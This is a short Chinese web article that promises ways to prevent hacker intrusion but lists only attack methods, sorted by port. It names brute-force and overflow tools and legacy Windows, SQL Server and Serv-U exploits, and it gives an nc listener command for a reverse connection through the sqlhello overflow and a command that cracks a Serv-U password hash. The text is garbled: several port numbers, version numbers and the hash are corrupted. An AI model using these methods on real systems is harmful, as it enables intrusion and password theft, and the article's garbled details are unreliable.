大家好,农企新闻小编来为大家解答以上问题。防止黑客入侵的有效途径,常见的黑客入侵方法与防范很多人还不知道,现在让我们一起来看看吧!
1.使用端口4899入侵
端口499是由远程控制软件(远程管理员)的服务器监控的端口。不能算是木马程序,但是有远程控制的功能,通常杀毒软件也发现不了。
使用4899 filter.exe扫描密码为空的机器。
2.利用3899的入侵
非常早期的机器,试试3389的溢出。
对于2000的机器,可以试试字典爆炸。
3.使用1433端口入侵
SQL Server的默认端口433为SQL Server服务使用两个端口:TCP-1433和UDP-1434。其中,1433用于SQL Server提供外部服务,1434用于向请求方返回SQL Server使用哪个TCP/IP端口。
scanport.exe有1433台机器
SQLScanPass.exe字典爆炸(字典是关键)
SQLTools.exe终于入侵了。
sql的sp2及以下版本的系统可以被sql的hello溢出漏洞入侵。
Nc -vv -l -p本地端口sqlhelloF.exe入侵ip 1433本地ip本地端口
(以上反过来,测试成功)
Sqlhelloz.exe入侵ip 1433(这是正向连接)
4.使用端口80的入侵
端口80对HTTP(超文本传输协议)开放,这是网上冲浪最常用的协议。它主要用于WWW(万维网),这是在万维网上传输信息的协议。在HTTP地址(即“URL”)上加上“:80”就可以访问网站,因为网页浏览服务的默认端口号是80,所以只需要输入URL而不是“336080”。
对于sp3之前的机器,可以用webdav入侵;
对于bbs论坛,可以尝试上传漏洞(upfile.exe或dvup_delphi.exe)
可以使用SQL进行注入。(小容的注射软件)。
5.使用serv-u入侵(端口21)
端口21主要用于FTP(文件传输协议)服务。FTP服务主要用于两台电脑之间上传和下载文件。一台计算机用作FTP客户端,另一台计算机用作FTP服务器。可以使用匿名登录和授权用户名和密码登录来登录FTP服务器。
五美元。004及以下系统,可以使用溢出入侵。(serv5004.exe)
对于5.1.0.0及以下系统,可以提升本地权限。(servlocal.exe)
serv-u的MD5加密密码可以被字典破解。(crack.vbs)
输入一个由serv-u加密的密码(34位长),与字典文件(dict.txt)比较得到密码。例如cscriptcrack . VB sib 0 ad 10648 f 17 e 9 E8 D1 f 316 C1 ba 75105 a。
6.使用端口554
和real554.exe一起入侵。
7.使用端口6129
和DameWare6129.exe一起入侵。
8.利用系统漏洞
使用端口135和445,利用ms03026、ms03039、ms03049和ms04011的漏洞,
进行溢出入侵。
9.使用3127等端口。
你可以使用末日病毒打开的端口入侵nodoom.exe。(在mydoomscan.exe中提供)。
10.利用其他入侵。
利用卢杉的入侵软件入侵WINNTAutoAttack.exe。